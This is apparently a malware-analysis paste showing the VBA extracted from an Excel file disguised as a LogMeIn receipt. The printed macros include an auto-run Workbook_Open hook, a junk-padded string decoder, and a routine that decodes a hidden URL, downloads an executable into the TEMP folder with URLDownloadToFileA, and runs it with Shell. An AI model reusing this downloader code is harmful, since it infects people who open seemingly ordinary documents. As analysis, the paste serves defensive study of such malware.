Advertisement
dynamoo

Malicious Excel macro

Feb 25th, 2015
709
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Flags       Filename                                                        
  2. ----------- -----------------------------------------------------------------
  3. OLE:MAS---- logmein_pro_receipt.xls
  4.  
  5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  6.  
  7. ===============================================================================
  8. FILE: logmein_pro_receipt.xls
  9. Type: OLE
  10. -------------------------------------------------------------------------------
  11. VBA MACRO ÝòàÊíèãà.cls
  12. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  14. Sub Workbook_Open()
  15. jQ5
  16. End Sub
  17. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  18. ANALYSIS:
  19. +----------+---------------+----------------------------------------+
  20. | Type     | Keyword       | Description                            |
  21. +----------+---------------+----------------------------------------+
  22. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  23. +----------+---------------+----------------------------------------+
  24. -------------------------------------------------------------------------------
  25. VBA MACRO Ëèñò1.cls
  26. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28. (empty macro)
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Ëèñò2.cls
  31. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33. (empty macro)
  34. -------------------------------------------------------------------------------
  35. VBA MACRO Ëèñò3.cls
  36. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  38. (empty macro)
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Class1.cls
  41. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. (empty macro)
  44. -------------------------------------------------------------------------------
  45. VBA MACRO Class2.cls
  46. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
  47. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  48. (empty macro)
  49. -------------------------------------------------------------------------------
  50. VBA MACRO Class3.cls
  51. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
  52. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  53. (empty macro)
  54. -------------------------------------------------------------------------------
  55. VBA MACRO Module1.bas
  56. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  57. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  58.  
  59. Public Function vxRuzMJsFffGPcDYCb(AUKBPaIIvwQgsU As String) As String
  60. GoTo jvLMiktQy
  61. jvLMiktQy:
  62. GoTo YexFubVVUa
  63. YexFubVVUa:
  64. For SrJVJGASPnQ = 1 To Len(AUKBPaIIvwQgsU) Step 2
  65. GoTo pPBRUYPoRwgcQlcS
  66. pPBRUYPoRwgcQlcS:
  67. GoTo ZZMyawIQEV
  68. ZZMyawIQEV:
  69. GoTo maQQjhDZxDzLOdzA
  70. maQQjhDZxDzLOdzA:
  71. GoTo OsHauNHxdmnlqbTbFSR
  72. OsHauNHxdmnlqbTbFSR:
  73. GoTo ogETMxfh
  74. ogETMxfh:
  75. vxRuzMJsFffGPcDYCb = vxRuzMJsFffGPcDYCb & Mid(AUKBPaIIvwQgsU, SrJVJGASPnQ, 1)
  76. GoTo wGcpdOq
  77. wGcpdOq:
  78. Next
  79. GoTo UmYcCdoiA
  80. UmYcCdoiA:
  81. GoTo pOGCNfuPDMkfIKrKQZN
  82. pOGCNfuPDMkfIKrKQZN:
  83. GoTo DBGekrVjiyCEw
  84. DBGekrVjiyCEw:
  85. GoTo dNvxRuzM
  86. dNvxRuzM:
  87. GoTo FffGPcDYCb
  88. FffGPcDYCb:
  89. GoTo tEyQzQGQQSfvKRTdAv
  90. tEyQzQGQQSfvKRTdAv:
  91. End Function
  92.  
  93. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  94. ANALYSIS:
  95. No suspicious keyword or IOC found.
  96. -------------------------------------------------------------------------------
  97. VBA MACRO Class4.cls
  98. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
  99. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  100. (empty macro)
  101. -------------------------------------------------------------------------------
  102. VBA MACRO Class5.cls
  103. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
  104. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  105. (empty macro)
  106. -------------------------------------------------------------------------------
  107. VBA MACRO Class6.cls
  108. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class6'
  109. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  110. (empty macro)
  111. -------------------------------------------------------------------------------
  112. VBA MACRO dfgfdg.bas
  113. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/dfgfdg'
  114. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  115. #If VBA7 Then
  116.     Private Declare PtrSafe Function FnjkHBKJBl Lib "urlmon" Alias _
  117.     "URLDownloadToFileA" (ByVal sdfFFF As LongPtr, _
  118.     ByVal kJNJKBl As String, _
  119.     ByVal ghjVFF As String, _
  120.     ByVal BGgdhF As Long, _
  121.     ByVal VVgfh As LongPtr) As LongPtr
  122. #Else
  123.     Private Declare Function FnjkHBKJBl Lib "urlmon" Alias _
  124.     "URLDownloadToFileA" (ByVal sdfFFF As Long, _
  125.     ByVal kJNJKBl As String, _
  126.     ByVal ghjVFF As String, _
  127.     ByVal BGgdhF As Long, _
  128.     ByVal VVgfh As Long) As Long
  129. #End If
  130. Sub jQ5()
  131. mog4O4d49 vxRuzMJsFffGPcDYCb("hHtztHp^:R/u/Ujuanvidze,sMijgxn{.)dWeM/…j%sd/pb1i@n,.ie`xae^"), Environ(vxRuzMJsFffGPcDYCb("TgMJPW")) & vxRuzMJsFffGPcDYCb("\eG…HUjSkrd_fdgT.„eXx/e+")
  132. End Sub
  133. Function mog4O4d49(Mh9_094suu As String, R4_t As String) As Boolean
  134. vJHKBJdfkgfg = FnjkHBKJBl(0&, Mh9_094suu, R4_t, 0&, 0&)
  135. Dim j_W8
  136. j_W8 = Shell(R4_t, 1)
  137. End Function
  138.  
  139.  
  140.  
  141.  
  142. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  143. ANALYSIS:
  144. +------------+--------------------+-----------------------------------------+
  145. | Type       | Keyword            | Description                             |
  146. +------------+--------------------+-----------------------------------------+
  147. | Suspicious | Lib                | May run code from a DLL                 |
  148. | Suspicious | Shell              | May run an executable file or a system  |
  149. |            |                    | command                                 |
  150. | Suspicious | Environ            | May read system environment variables   |
  151. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  152. +------------+--------------------+-----------------------------------------+
  153. -------------------------------------------------------------------------------
  154. VBA MACRO Class7.cls
  155. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class7'
  156. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  157. (empty macro)
  158. -------------------------------------------------------------------------------
  159. VBA MACRO Module2.bas
  160. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  161. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  162. (empty macro)
  163. -------------------------------------------------------------------------------
  164. VBA MACRO Class8.cls
  165. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class8'
  166. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  167. (empty macro)
  168. -------------------------------------------------------------------------------
  169. VBA MACRO Class9.cls
  170. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class9'
  171. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  172. (empty macro)
  173. -------------------------------------------------------------------------------
  174. VBA MACRO Class10.cls
  175. in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class10'
  176. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  177. (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement